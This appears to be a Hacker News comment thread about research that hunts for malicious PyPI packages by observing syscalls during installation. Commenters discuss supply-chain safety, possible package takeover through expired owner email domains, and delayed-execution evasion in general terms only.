Hunting for Malicious Packages on PyPI

Hey friends! Author here.<p>If you&#x27;re looking for a tl;dr you can find one on Twitter (with pictures!) [0]<p>This research was a blast to do, and I learned a ton. Happy to answer questions!<p>[0] <a href="https:&#x2F;&#x2F;twitter.com&#x2F;jw_sec&#x2F;status&#x2F;1326908628411047937" rel="nofollow">https:&#x2F;&#x2F;twitter.com&#x2F;jw_sec&#x2F;status&#x2F;1326908628411047937</a>

One of the PyPI maintainers noted:<p>&gt; This is a great approach to detecting malicious code execution in Python packages.<p>&gt; ... anyone want to fund making this part of @pypi?<p><a href="https:&#x2F;&#x2F;twitter.com&#x2F;di_codes&#x2F;status&#x2F;1327121326734241797" rel="nofollow">https:&#x2F;&#x2F;twitter.com&#x2F;di_codes&#x2F;status&#x2F;1327121326734241797</a><p>I think this is an obvious place that someone in the ecosystem could apply money and make their supply chain (and everyone else&#x27;s) safer.

Something that just occurred to me - has anyone checked registries for owners with email addresses on either expired domains, or now available public domain addresses?<p>This seems like a ripe angle for package take-over.

&gt; I still don’t like that it’s possible to run arbitary commands on a user’s system just by them pip installing a package.<p>Is there a build system out there that doesn&#x27;t have this feature? Pip is both a package manager and build system since many packages are compiled at install time.

Looks like a great initiative and glad to hear this is getting attention.<p>The technique of observing syscalls has clear benefits. However might there be ways of evading this simply by setting up a some kind of delayed process so the syscall doesn&#x27;t happen during the observation window or is only triggered rarely or on certain combinations that might not typically be tested (meaning it could still be caught in theory but the chances are much lower)?

i really enjoyed this write up. i am glad someone far smarter than me is thinking about this problem.